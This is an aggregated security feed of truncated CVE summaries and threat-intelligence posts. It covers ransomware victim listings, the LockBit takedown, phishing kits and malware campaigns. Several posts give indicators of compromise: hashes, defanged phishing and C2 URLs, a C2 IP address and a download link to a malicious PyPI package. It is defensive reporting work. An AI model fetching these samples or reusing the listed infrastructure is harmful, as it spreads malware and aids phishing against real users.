CVE-2024-23123 -- A maliciously crafted CATPART file when parsed in CC5Dll.dll and ASMBASE228A.dll through Autodesk AutoCAD can force an Out-of-Bound Write. A malicious actor can leverage this vulnerability to cause a crash, write sensitive data, or execute arbitrary code
CVE-2024-23125 -- A maliciously crafted SLDPRT file when parsed ODXSW_DLL.dll through Autodesk AutoCAD can be used to cause a Stack-based Overflow. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the con
CVE-2024-23126 -- A maliciously crafted CATPART file when parsed CC5Dll.dll through Autodesk AutoCAD can be used to cause a Stack-based Overflow. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the conte
CVE-2024-23127 -- A maliciously crafted MODEL, SLDPRT or SLDASM file when parsed VCRUNTIME140.dll through Autodesk AutoCAD can be used to cause a Heap-based Overflow. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitr
CVE-2024-23128 -- A maliciously crafted MODEL file in libodxdll.dll when parsed through Autodesk AutoCAD could lead to a memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in
CVE-2024-23129 -- A maliciously crafted MODEL 3DM, STP or SLDASM files in opennurbs.dll when parsed through Autodesk AutoCAD could lead to a memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead t
CVE-2024-23130 -- A maliciously crafted SLDASM, or SLDPRT files in ODXSW_DLL.dll when parsed through Autodesk AutoCAD could lead to a memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code
CVE-2024-23131 -- A maliciously crafted STP file in ASMKERN228A.dll or ASMDATAX228A.dll when parsed through Autodesk AutoCAD could lead to a memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead t
CVE-2024-23132 -- A maliciously crafted STP file in atf_dwg_consumer.dll when parsed through Autodesk AutoCAD could lead to a memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code executio
CVE-2024-23133 -- A maliciously crafted STP file in ASMDATAX228A.dll when parsed through Autodesk AutoCAD could lead to a memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in
CVE-2024-23134 -- A maliciously crafted IGS file when tbb.dll parsed through Autodesk AutoCAD can be used in user-after-free vulnerability. This vulnerability, along with other vulnerabilities, could lead to code execution in the current process.
CVE-2024-23135 -- A maliciously crafted SLDPRT file when ASMkern228A.dll parsed through Autodesk AutoCAD can be used in user-after-free vulnerability. This vulnerability, along with other vulnerabilities, could lead to code execution in the current process.
CVE-2024-23136 -- A maliciously crafted STP file when ASMKERN228A.dll parsed through Autodesk AutoCAD can be used to dereference an untrusted pointer. This vulnerability, along with other vulnerabilities, could lead to code execution in the current process.
CVE-2024-23137 -- A maliciously crafted STP or SLDPRT file when ODXSW_DLL.dll parsed through Autodesk AutoCAD can be used to uninitialized variable. This vulnerability, along with other vulnerabilities, could lead to code execution in the current process.
CVE-2024-23349 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache Answer.This issue affects Apache Answer: through 1.2.1.
CVE-2024-24817 -- Discourse Calendar adds the ability to create a dynamic calendar in the first post of a topic on the open-source discussion platform Discourse. Prior to version 0.4, event invitees created in topics in private categories or PMs (private messages) can be r
CVE-2024-25021 -- IBM AIX 7.3, VIOS 4.1's Perl implementation could allow a non-privileged local user to exploit a vulnerability to execute arbitrary commands. IBM X-Force ID: 281320.
CVE-2024-25129 -- The CodeQL CLI repo holds binaries for the CodeQL command line interface (CLI). Prior to version 2.16.3, an XML parser used by the CodeQL CLI to read various auxiliary files is vulnerable to an XML External Entity attack. If a vulnerable version of the CL
CVE-2024-25130 -- Tuleap is an open source suite to improve management of software developments and collaboration. Prior to version 15.5.99.76 of Tuleap Community Edition and prior to versions 15.5-4 and 15.4-7 of Tuleap Enterprise Edition, users with a read access to a tr
CVE-2024-25251 -- code-projects Agro-School Management System 1.0 is suffers from Incorrect Access Control.
CVE-2024-25369 -- A reflected Cross-Site Scripting (XSS) vulnerability in FUEL CMS 1.5.2allows attackers to run arbitrary code via crafted string after the group_id parameter.
CVE-2024-25385 -- An issue in flvmeta v.1.2.2 allows a local attacker to cause a denial of service via the flvmeta/src/flv.c:375:21 function in flv_close.
CVE-2024-25423 -- An issue in MAXON CINEMA 4D R2024.2.0 allows a local attacker to execute arbitrary code via a crafted c4d_base.xdl64 file.
CVE-2024-25746 -- Stack Based Buffer Overflow vulnerability in Tenda AC9 v.3.0 with firmware version v.15.03.06.42_multi allows a remote attacker to execute arbitrary code via the add_white_node function.
CVE-2024-25748 -- A Stack Based Buffer Overflow vulnerability in tenda AC9 AC9 v.3.0 with firmware version v.15.03.06.42_multi allows a remote attacker to execute arbitrary code via the fromSetIpMacBind function.
CVE-2024-25753 -- Stack Based Buffer Overflow vulnerability in Tenda AC9 v.3.0 with firmware version v.15.03.06.42_multi allows a remote attacker to execute arbitrary code via the formSetDeviceName function.
CVE-2024-25756 -- A Stack Based Buffer Overflow vulnerability in Tenda AC9 v.3.0 with firmware version v.15.03.06.42_multi allows a remote attacker to execute arbitrary code via the formWifiBasicSet function.
CVE-2024-25801 -- SKINsoft S-Museum 7.02.3 allows XSS via the filename of an uploaded file. Unlike in CVE-2024-25802, the attack payload is in the name (not the content) of a file.
CVE-2024-25801 -- An arbitrary file upload vulnerability in the Add Media function of SKINsoft S-Museum v7.02.3 allows attackers to execute arbitrary code via a crafted PDF file.
CVE-2024-25802 -- SKINsoft S-Museum 7.02.3 allows Unrestricted File Upload via the Add Media function. Unlike in CVE-2024-25801, the attack payload is the file content.
CVE-2024-25828 -- cmseasy V7.7.7.9 has an arbitrary file deletion vulnerability in lib/admin/template_admin.php.
CVE-2024-25850 -- Netis WF2780 v2.1.40144 was discovered to contain a command injection vulnerability via the wps_ap_ssid5g parameter
CVE-2024-25851 -- Netis WF2780 v2.1.40144 was discovered to contain a command injection vulnerability via the config_sequence parameter in other_para of cgitest.cgi.
CVE-2024-25873 -- Enhavo v0.13.1 was discovered to contain an HTML injection vulnerability in the Author text field under the Blockquote module. This vulnerability allows attackers to execute arbitrary code via a crafted payload.
CVE-2024-25874 -- A cross-site scripting (XSS) vulnerability in the New/Edit Article module of Enhavo CMS v0.13.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Create Tag text field.
CVE-2024-25875 -- A cross-site scripting (XSS) vulnerability in the Header module of Enhavo CMS v0.13.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Undertitle text field.
CVE-2024-25876 -- A cross-site scripting (XSS) vulnerability in the Header module of Enhavo CMS v0.13.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title text field.
CVE-2024-26128 -- baserCMS is a website development framework. Prior to version 5.0.9, there is a cross-site scripting vulnerability in the content management feature. Version 5.0.9 contains a fix for this vulnerability.
CVE-2024-26152 -- ### Summary
CVE-2024-26281 -- Upon scanning a JavaScript URI with the QR code scanner, an attacker could have executed unauthorized scripts on the current top origin sites in the URL bar. This vulnerability affects Firefox for iOS < 123.
CVE-2024-26282 -- Using an AMP url with a canonical element, an attacker could have executed JavaScript from an opened bookmarked page. This vulnerability affects Firefox for iOS < 123.
CVE-2024-26283 -- An attacker could have executed unauthorized scripts on top origin sites using a JavaScript URI when opening an external URL with a custom Firefox scheme. This vulnerability affects Firefox for iOS < 123.
CVE-2024-26284 -- Utilizing a 302 redirect, an attacker could have conducted a Universal Cross-Site Scripting (UXSS) on a victim website, if the victim had a link to the attacker's website. This vulnerability affects Focus for iOS < 123.
CVE-2024-26349 -- flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /core/tools/delete_translation.php
CVE-2024-26349 -- flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /core/tools/delete_translation.php
CVE-2024-26350 -- flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /core/tools/update_contact_form_settings.php
CVE-2024-26350 -- flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /core/tools/update_contact_form_settings.php
CVE-2024-26351 -- flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /core/tools/update_place.php
CVE-2024-26351 -- flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /core/tools/update_place.php
CVE-2024-26352 -- flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /core/tools/add_places.php
CVE-2024-26352 -- flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /core/tools/add_places.php
CVE-2024-26445 -- flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /core/tools/delete_place.php
CVE-2024-26481 -- Kirby CMS v4.1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the URL parameter.
CVE-2024-26482 -- An HTML injection vulnerability in the Edit Content Layout module of Kirby CMS v4.1.0 allows attackers to execute arbitrary code via a crafted payload.
CVE-2024-26483 -- An arbitrary file upload vulnerability in the Profile Image module of Kirby CMS v4.1.0 allows attackers to execute arbitrary code via a crafted PDF file.
CVE-2024-26484 -- A stored cross-site scripting (XSS) vulnerability in the Edit Content Layout module of Kirby CMS v4.1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Link field.
CVE-2024-26489 -- A cross-site scripting (XSS) vulnerability in the Addon JD Flusity 'Social block links' module of flusity-CMS v2.33 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Profile Name text field.
CVE-2024-26490 -- A cross-site scripting (XSS) vulnerability in the Addon JD Simple module of flusity-CMS v2.33 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title text field.
CVE-2024-26491 -- A cross-site scripting (XSS) vulnerability in the Addon JD Flusity 'Media Gallery with description' module of flusity-CMS v2.33 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Gallery name text field.
CVE-2024-26578 -- Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') vulnerability in Apache Answer.This issue affects Apache Answer: through 1.2.1.
CVE-2024-27283 -- A vulnerability was discovered in Veritas eDiscovery Platform before 10.2.5. The application administrator can upload potentially malicious files to arbitrary locations on the server on which the application is installed.
ALPHV #ransomware group has added Family Health Center (fhckzoo.com) to their victim list. #USA#alphv #cyberattack #databreach #darkweb -- FalconFeedsio
🚨 New group detected! 🚨 We've identified a new DDOS for hire group named InfraShutdown. The group claims to have targeted ISPs in Chad, Uganda, Poland, Israel, South Africa, Djibouti, etc. They were promoted by Anonymous Sudan. #DDOS #ThreatIntel #Cyberat -- FalconFeedsio
RansomHouse #ransomware group has added Rapid Granulator (rapidgranulator.com) to their victim list. #Sweden#RansomHouse #databreach #cti #darkweb #cyberattack -- FalconFeedsio
On 2024-02-09, I saw #KeyholeVNC traffic from a #Latrodectus infection. I previously saw Keyhole VNC from #IcedID (#Bokbot) and #BazarLoader back when those two malware families were active. Here's a screenshot taken from decoded VNC traffic on 2024-02-09 -- malware_traffic
The #ContactForms campaign uses website contact forms to send messages impersonating copyright infringement notices (formerly called the #StolenImages campaign). Currently, links go to a fake Azure page that returns a JavaScript (.js file) to install #La -- malware_traffic
2024-02-09, 02-22 and 02-23: Data dump for #Latrodectus malware infections from #ContactForms campaign. #pcap files, malware samples, and IOCs available at malware-traffic-analysis.net…Latrodectus (BLACKWIDOW) took over for #IcedID (#Bokbot) late last yea -- malware_traffic
Apparently on LinkedIn Lockbit, ALPHV, and HIVE are actually all the same group -- vxunderground
Cactus #ransomware group has added Remkes The Poultry Family (remkes.nl) to their victim list. #Netherlands#cactus #darkweb #databreach #cyberattack -- FalconFeedsio
This place is becoming a ghost town. Really quite sad to see Twitter wither. -- nullcookies
Hi there—Bad Domain’s back and grumpier than ever. Here’s my latest album, Aurora. Enjoy.baddomain.bandcamp.com/album… -- nullcookies
Increased visibility into the TTPs of Chinese hackers is one of the outcomes of the data leaks affecting Chinese IT company i-Soon (aka Auxun). Our observations link leaked texts to two Chinese-affiliated APTs. bit.ly/4bRiSu4 -- unit42_intel
"Thanks for calling AT&T how can China connect you?" -- hackerfantastic
What year is it? -- hackerfantastic
492ac25608dda01b3f776b46a7631bb8cd91a0ce0168931ec5bb9a846e702e39 -- malwrhunterteam
test for issue 44 dlvr.it/T39TbH #OSINT #Medium -- osintbear
HRC and U.N. Human Rights launch Berkeley Protocol dlvr.it/T39Tb1 #OSINT #Medium -- osintbear
OSINT (Open Source Intelligence) Açık Kaynak İstihbaratı dlvr.it/T39TZZ #OSINT #Medium -- osintbear
Group: playApprox. Time: 23:37 23/02/24Title: Welch's -- RansomwareNews
-- vxunderground
I've processed @HuntressLabs' awesome report on post-exploitation activities observed in relation to the #ScreenConnect vulnerability and created 15 YARA rulesReporthuntress.com/blog/slashandgr… Rulesgithub.com/Neo23x0/signature…(I've put the @thor_scanne -- cyb3rops
"rustercoin.pdf.lnk": fa12c39db075c3724509b82bbbb066475046fc87ddf034892d633dc184c2b8e5Next stage (opendir): https://rustercoin[.]com/rustercoin😂 -- malwrhunterteam
How Can You Collect Information From Target in Hacking? dlvr.it/T39LgW #OSINT #Medium -- osintbear
Group: huntersApprox. Time: 21:45 23/02/24Title: IJM Corporation -- RansomwareNews
Group: alphvApprox. Time: 21:45 23/02/24Title: Family Health center -- RansomwareNews
Want to learn how to recover more credentials than just Kerberos tickets from LSASS without accessing its memory? Join @mcbroom_evan at SO-CON 2024 for his talk "LSA Whisperer" to learn how!Learn more 👉 specterops.io/so-con -- specterops
We moved the @HuntressLabs YARA rule & some of our own into my open source repo, which is used for THOR Lite⚡️& THOR Cloud Lite 🌩️> use use these free tools to perform compromise assessments on your hosts ✅github.com/Neo23x0/signature…THOR Cloud Litethorc -- cyb3rops
Microsoft must be proudly hosting this @Trezor phishing: https://trezaorsuitewalle.azurewebsites[.]net/🤷‍♂️ -- malwrhunterteam
Microsoft must be proudly hosting this @MetaMask phishing: https://metamasks.azurewebsites[.]net/🤷‍♂️ -- malwrhunterteam
Another: https://web-ttrezoer.azurewebsites[.]net/ -- malwrhunterteam
Dark Web Introduction 101 dlvr.it/T39CQJ #OSINT #Medium -- osintbear
Group: cactusApprox. Time: 18:43 23/02/24Title: remkes.nl\$31.4M\Netherlands\190GB\&lt;1%DISCLOSED -- RansomwareNews
Group: ransomhouseApprox. Time: 18:43 23/02/24Title: Rapid Granulator -- RansomwareNews
Introduction by @linode to Linux red teaming basic techniquesExploitation: linode.com/docs/guides/linux…Escalation: linode.com/docs/guides/linux…Persistence: linode.com/docs/guides/linux…#Linux #cybersecurity -- 0xor0ne
Great writeup by @0vercl0k on pwning a TP-Link AC1750 (Pwn2Own 2021)Couple years old but still a good read for anyone interested in consumer routers securitydoar-e.github.io/blog/2022/0…#iot #cybersecurity -- 0xor0ne
One of the final LockBit assets that has not been seized, LockBit Leaked is showing some signs of life. /lockbit7… -- alvieriD
Monti #ransomware group has added APEX GmbH (apexspedition.de) to their victim list.#Germany#Monti #cti #cyberattack #darkweb #databreach -- FalconFeedsio
Microsoft must be proudly hosting this @exodus_io phishing: https://exodislogn.azurewebsites[.]net/🤷‍♂️ -- malwrhunterteam
-- malwrhunterteam
-- malwrhunterteam
5/xLa filtración del día de hoy por parte del mismo actor de amenazas contra otra dependencia, anula por completo la versión oficial dada por el Gobierno. -- n4hualH
4/xPor supuesto, esta afirmación fue criticada por la comunidad de ciberseguridad por carecer de sentido, ya que "m1000" llevaba activo casi un año en el foro al momento de la filtración, habiendo subido leaks del sector público y privado. -- n4hualH
3/xLo interesante de todo esto, es que cuando el gobierno informó de la filtración antes mencionada, argumentó que había sido obra de un ex trabajador que aún tenía las "credenciales de acceso" y que por eso había accedido al sistema. -- n4hualH
2/xLa filtración fue realizada por el usuario "m1000" famoso por haber filtrado la base de datos de los periodistas asistentes a las conferencias matutinas del Ejecutivo. -- n4hualH
1/xEl día de hoy, @victor_ruiz reportó la filtración de datos relacionados al sector salud, que contiene 5 millones de registros. -- n4hualH
Con su declaración del día de hoy, el Presidente, sin quererlo, le dió el espaldarazo a la marcha del fin de semana pasado. -- n4hualH
A Novel Approach to 802.11 Probe Request Analysis, Part III dlvr.it/T38wsv #OSINT #Medium -- osintbear
Learn how you can use BHE to find and fix Active Directory misconfigurations that could allow attackers to easily own your entire enterprise. Check out @JustinKohler10's conversation with @riskybusiness ➡️ ghst.ly/3HQc3eB -- specterops
The evolution of threat actor tactics is detailed in the 2024 Unit 42 Incident Response Report. We summarize the details of our findings here: bit.ly/3T0BsbM -- unit42_intel
This week has been fundamentally similar to HBO's Game of Thrones.It started off strong, had a wonderful plot and development. It had twists, turns, cool cameo appearances. Then it suddenly ended and you say, "what the fuck is that" -- vxunderground
Challenges Remain in Evaluating Ransomware Crackdowns decipher.sc/challenges-remai… #decipher #deciphersec -- DecipherSec
MEDUSA #ransomware group has added 2 new victims to their #darkweb portal.- Acorn Property Group 🇬🇧- Pressco Technology 🇺🇸#UK #USA#medusa #cti #darkweb #databreach #cyberattack -- FalconFeedsio
NoName claims to have targeted multiple websites in Denmark.- Danske bank- Sydbank- BankInvest#Denmark#ddos #cti #cyberattack #threatintel -- FalconFeedsio
The comments about Nokia 3310 and comparison to industrial control systems were painful, this is what happens when civil servants push policy changes that favored biased technical output from its bubble sphere of trusted providers. You get a government di -- hackerfantastic
Check out this unfunny comedy show, where the UK government shows how disconnected their so-called hacker experts are. Repair shops have been and always will be, hotbeds of malicious activity, the bulk of phishing kits sold are for iCloud activation phish -- hackerfantastic
original and translation -- Hexacorn
"SexArchive - RUSSIA.apk": 73f10ce583f3ce6336809b5e00e7578aa9c65369f86209a0e287298d28b26dcb -- malwrhunterteam
Estarán contratando?Quiero ganar experiencia en psyops. -- n4hualH
Behind a Secretive Global Network of Non-consensual Deepfake Pornography dlvr.it/T38gfP #bellingcat -- osintbear
Group: medusaApprox. Time: 15:45 23/02/24Title: Acorn -- RansomwareNews
Group: medusaApprox. Time: 15:45 23/02/24Title: Pressco Technology -- RansomwareNews
Group: bianlianApprox. Time: 14:38 23/02/24Title: H*********** *********y ********** -- RansomwareNews
ICYMI: You can catch @Praga_Prag & @synth_nic0's webinar from yesterday on demand now! Get the scoop on some of the techniques used by adversaries to gain & sustain access within a domain & hear about effective recovery strategies. 👀: ghst.ly/3HE1wDl -- specterops
This report is filled with exceptional graphics that not only illustrate our findings but also enhance your reading experience.The analysts have dedicated countless hours to meticulously detail every aspect of this report.We hope you enjoy it! -- TheDFIRReport
#CVE20241708 and #CVE20241709 affect remote desktop app #ScreenWise. These new vulnerabilities, scored 8.4 and 10 in severity, were disclosed by parent company ConnectWise this week. Read on for mitigation steps and more: bit.ly/49pfncK -- unit42_intel
Dive into Unit 42’s 2024 Incident Response Report with CTO @mikesiko in this episode of Threat Vector. Unearth insights on the emerging cyber threats, novel tactics, and how AI is reshaping the cybersecurity landscape. bit.ly/49oEKeL -- unit42_intel
We've updated this article with information from CISA as well as new product protections. -- unit42_intel
We asked Lockbit ransomware group administration their thoughts on this past week.Lockbit ransomware group said they will make formal reply to law enforcement once they're finished restoring their infrastructureALPHV said: "My Mercedes drives Lockbit" -- vxunderground
finance.sina.cn/usstock/hlwg… -- 58_158_177_102
cuife.cn/ -- 58_158_177_102
shutd0wn(吴) and Wang(王) run another company.This combination is same as i-SOON. -- 58_158_177_102
If you need to discover malware infrastructure using censys,See this article for queries and techniques you can use to track malware infrastructure.censys.com/a-beginners-guide…@embee_research#OSINT #investigation #cybersecurity #intelligence #threatintel -- DailyOsint
Can't attend on Tuesday? Register anyway - we'll email you a link to watch the recording later so you don't miss out: intezer.com/webinar-cyber-wa…#cybersecurity #incidentresponse #securityoperations -- IntezerLabs
That "pycryptoconf-1.0.6-py3-none-any.whl" sample is still available here after ~4 months: https://files.pythonhosted[.]org/packages/7c/c3/3ed47954065d5c80a0b0b6ca7c18555b23d189ef5b1b565fd93baff21c28/pycryptoconf-1.0.6-py3-none-any.whl -- malwrhunterteam
Looking at the relations of "__init__.py" which was mentioned by @ShadowChasing1 (nitter.net/ShadowChasing1/s…), we can find some more samples, including "pycryptoconf-1.0.6-py3-none-any.whl": 6bba8f488c23a0e0f753ac21cd83ddeac5c4d14b70d4426d7cdeebdf813a10 -- malwrhunterteam
Of course they could not say it already that time, because you know, marketing...🤷‍♂️ -- malwrhunterteam
The Sword of Damocles: Understanding the Threat of Known Exploited Vulnerabilities dlvr.it/T38Tw9 #OSINT #Medium -- osintbear
Group: montiApprox. Time: 13:43 23/02/24Title: APEX - apexspedition.de -- RansomwareNews
Are you ready for the new #NIS2 standards in the European Union? In this week's episode of Talos Takes, we look at what these standards are, exactly, and the best place to start for organizations of all sizes cs.co/6010noBd4 -- talossecurity
On Monday when the Lockbit ransomware group website was seized by FBI, NCA UK, and EUROPOL, they made a post titled "Who is Lockbitsupp?" - this post indicated that law enforcement could potentially unveil key leadership behind the organization.During the -- vxunderground
SentinelLabs and ClearSky Cyber Security have been tracking the activities of a suspected Russia-aligned influence operation network named Doppelgänger. sentinelone.com/labs/doppelg… @LabsSentinel @ClearskySec -- 780thC
Try advanced malware analysis for FREE 🎁💻 Analyze files or links and get the first results in 5 sec👾 Browse our 6M database of #malware samples🕵️ Use #ChatGPT for deeper insightsRegister for free 👉 app.any.run/#register?utm_so… -- anyrun_app
ALPHV #ransomware group has added ANDFLA (andfla.ro) to their victim list.#Romania#alphv #cti #cyberattack #darkweb #databreach -- FalconFeedsio
fake website @Namecheap (thanks) -- JAMESWT_MHT
Bit of a waste of a morning! Police teased all week that they would release the identity of LockBit's head honcho today. 31,000 people visited the darknet page with a countdown timer to be met with.... a cat cartoon... -- joetidy
Ahhhhhh man. That was a bit (a lot) of an anticlimax. But looks like the infamous LockbitSupp kingpin is cooperating with cops so that could be interesting. -- joetidy
So, here is the "Who is LockbitSupp?" update.😂"LockbitSupp has engaged with Law Enforcement :) "🤔 -- malwrhunterteam
Group: alphvApprox. Time: 10:43 23/02/24Title: ANDFLA SRL -- RansomwareNews
#ROKRAT #APT37 #APT #IOCIMG_20240214_0001.pdf.lnk515194ef77fbbe04845de290eefd0049 -- suyog41
HavocFévrier 2024 - PLV 83 - rayon BVP.docxe0ed1d4f29a683f5fb13815f5c07a91fplan_merch_fevrier_S8_2024.pdf.lnkfedb108d683907719589931e7480d042dropbox.ps1085fb0dc9ed80368eeebc623a91f40f6gsvc.exe593ece2df3b37238fe68c36d0b9ba074C2212.47.244[.]109#Havoc #IOC -- suyog41
XWorm V5.2 64798bc9d1a0f9de0229e581aae05d86#XWorm #IOC -- suyog41
In a shocking revelation, it turns out LockbitSupp was run by this adorable, evil-looking cat! -- vxunderground
Here are the current Boris Bailbonds of Vegas extended odds for the first to post the identity of LockBitSup at 7am est:@vxunderground 2 to 1 favorites@SOSIntel 8 to 1@Cyberknow20 20 to 1@DarkWebInformer 25 to 1@H4ckManac 33 to 1@malwrhunterteam 100 to 1 -- alvieriD
Google added a new security feature to Chrome in v122, released this week.It's inspired by Edge's Super Duper Secure Mode and works by disabling V8 JIT, a source of many zero-days and vulnerabilities.More newsletter details here: mastodon.social/@campusco -- campuscodi
🚨Attention all followers! 🚨In the past 30 days alone, there have been a staggering 364 ransomware incidents, with Lockbit 3.0 emerging as the most active threat actor. Shockingly, the Buildings and Constructions industry has been hit the hardest.Stay info -- FalconFeedsio
"іⅼ tսο ассоսոt è а rіѕсhіο ⅾі ѕοѕреոѕіоոе"#phishing #bank #italy@BancoBPMSpahttps://yerzisukka.bubbleapps[.io/https://favtqgbfht.cfolks[.pl/bpm/bpm/ -- JAMESWT_MHT
😂 -- malwrhunterteam
Just saw that the CEO of this "NicNames" is the founder of @nic_ua. If I would have domains at @nic_ua, this would be the moment when I would start looking for another registrar to move my domains to, immediately.🤷‍♂️ -- malwrhunterteam
Sekoia.io researchers provide an overview of the evolution of Scattered Spider, its modus operandi and the toolset leveraged over recent years. Additionally, they look into the TTPs, the latest ongoing campaigns and their current targets. blog.sekoia.io/s -- virusbtn
Aqua Nautilus researchers analyse a Lucifer DDoS botnet campaign targeting Apache Hadoop & Apache Druid. The attacker exploits existing misconfigurations and vulnerabilities to execute the attacks. aquasec.com/blog/lucifer-ddo… -- virusbtn
SentinelLabs & ClearSky Cyber Security look into a Russia-aligned influence operation network. Doppelgänger spreads propaganda & disinformation through news articles focused on current socio-economic & geopolitical topics relevant to the general populatio -- virusbtn
Today the FBI, NCA UK, and EUROPOL, partnering with Chainalysis, revealed information on Lockbit ransomware group money flow.The following data was retrieved from July, 2022 - February 2024. Lockbit was first observed in late 2019. This analysis only cove -- vxunderground
Introduction to stack spoofing techniques (Windows, x64)Credits @d_tranmandtsec.us/2023-09-15-StackSpo…#infosec #cybersecurity #windows -- 0xor0ne
Crypto analysis is in over $113 million in LockBit Bitcoin frozen. They have the ransomed company number only representing an 18 month total btw. -- alvieriD
Operation Cronos retrieved over 30,000 Bitcoin addresses with 500 active holding over 2,200 BTC or approximately $113,000,000 from LockBit and affiliates. -- alvieriD
8BASE #ransomware has added C&J Industries (cjindustries.com) to their victim list. #USA#8base #databreach #cti #cyberattack -- FalconFeedsio
Looks like the cops are teasing us. Originally this post was going to be up at 7am… -- joetidy
As they promised, the "Lockbit Crypto" update is here.The "Who is LockbitSupp?" entry also should get published at the same time as that, but instead of published, the waiting time got extended by 5 hours.🤔 -- malwrhunterteam
⚠️ In this Week's Intelligence Update: Global Law Enforcement Operation Successfully Disrupts LockBit Ransomware | AI Technologies To Fuel Disinformation Risks On 2024 Elections. bit.ly/3uSELIO#ThreatIntelligence #Cybersecurity #LockBit #AI #Elections2024 -- QuoIntelligence
🧬+ Recent InfoBlackBerry JP: blogs.blackberry.com/ja/jp/2…Mikhail:nitter.net/500mk500/status/…CyberTeam: -- RexorVc0
#IOC7bea8ea83d5b4fe5985172dbb4fa146804e9ce276b3cd75fc2b20b9b33080f7efbc352200d4a5d4d79742b7fd862165b92612dc223e8f0656512cd882d66f78bhttp://dns-mofgovbt.ddns[.]net/update/http://microsoftupdte.redirectme[.]net/update🔗VT: virustotal.com/graph/embed/g… -- RexorVc0
#TTP 📩[T1566.001] Spear-Phishing📜[T1059.005] Mal VBS⚓️[T1053] Tasks to persist❌[T1070.004] Delete prev files📸[T1057] Check proc to Anti-Analysis🔎[T1082] Discover device info🧩[T1027] Encode info (B64+XOR)📡[T1071] C&C communication -- RexorVc0
#APT #SideWinder #RattleSnake #BabyElephant #threat #malware📍🇮🇳💥🇧🇹🇲🇲🇳🇵🌏⛓️ #Phishing > Doc (Macro) > #VBS in Startup > Check Net > Drop fake svchost.exe > Obtain Info > Encode > #C2🔗360 Advanced Threat Research: mp.weixin.qq.com/s?__biz=MzU… -- RexorVc0
Meanwhile there is a Lockbit impersonator on Telegram scamming people out of $150 😂😂😂 -- vxunderground
We stayed up to 2am for the FBI / NCA UK / EUROPOL "Who is LockbitSupp?" reveal.They extended the deadline 😡😡😡 -- vxunderground
Akira #ransomware group has added Quik Pawn Shop (quikpawnshop.com) to their victim list. #USA#akira #darkweb #databreach #cyberattack -- FalconFeedsio
OSINT Unleashed: Top 10 Search Operators You Need To Know dlvr.it/T37VR4 #OSINT #Medium -- osintbear
Reading again the jewels of Sci-Fi literature, I just notice how the "Information Control and Manipulation" it's such a core concept in their narratives.What do you think @DecryptedTech? -- n4hualH
OldTweetDeck: An Alternative to X Pro dlvr.it/T37JPX #OSINT #Medium -- osintbear
Boosting @gh0stbrain .. Aspiring pentester -- 424f424f
Play Ransomware allegedly gamifies Welch’s.Welch’s plant in Erie was attacked halting production early in February which the company confirmed on Friday.The Erie, Pennsylvania plant is their largest and makes 280 different juices, jams and jellies. @Welch -- alvieriD
Play Ransomware allegedly gamifies Welch’s.Welch’s largest plant in Erie was attacked and confirmed by the company on Friday.The Erie, Pennsylvania plant makes 280 different juices, jams and jellies. @Welchs -- alvieriD
Is this @LastWeekTonight's effort to remove all the weird ads -- DrunkBinary
AI rewrites history book... -- hackerfantastic
Bad Domain’s second album, Aurora, should be complete in a few days. It’s an album about grief.I’d describe it as darkwave shoegaze. -- nullcookies
Group: 8baseApprox. Time: 01:57 23/02/24Title: C and J Industries, Inc. -- RansomwareNews
My blog summarizing my findings is here: -- bushidotoken
New Blog! Lessons from the iSOON Leaksblog.bushidotoken.net/2024/0… -- bushidotoken
My iSOON analysis blog is nearly ready, sharing soon -- bushidotoken
This article focuses on Glupteba and a previously unreported feature, a UEFI bootkit. Researchers explore a recent campaign that delves into this botnet, from Glupteba’s pay-per-install ecosystem, its infection chain, how the #bootkit works and more. bit. -- unit42_intel
From #phishing to #ransomware to #APT groups — dynamic link library hijacking is ubiquitous. This article defines how it works and deconstructs numerous examples using observed campaigns. bit.ly/49GJYlS#DLLhijacking -- unit42_intel
LockBit returns. -- hackerfantastic
Group: playApprox. Time: 23:40 22/02/24Title: W???h? -- RansomwareNews
Today UnitedHealth Group, a large health insurance provider in the United States, submitted an SEC Form 8K - they've been compromised.The report does not indicate who is responsible for the attack.More information: sec.gov/Archives/edgar/data/… -- vxunderground
I’m thrilled to announce a new partnership between @BlackBerry & @SANSInstitute: We are working together to provide advanced technology and training to help grow and upskill #Malaysia’s #cybersecurity workforce, as well as make the Indo-Pacific region mor -- aboutsecurity
#0day #QNAP #QTS / #QuTS Hero Unauthenticated Remote #CodeExecution #Exploit #RCE 0day.today/exploit/descripti… -- inj3ct0r
#0day #CMSMadeSimple 2.2.19 Remote #CodeExecution #Vulnerability #RCE 0day.today/exploit/descripti… -- inj3ct0r
#0day #CMSMadeSimple 2.2.19 Cross Site Scripting #Vulnerability #XSS 0day.today/exploit/descripti… -- inj3ct0r
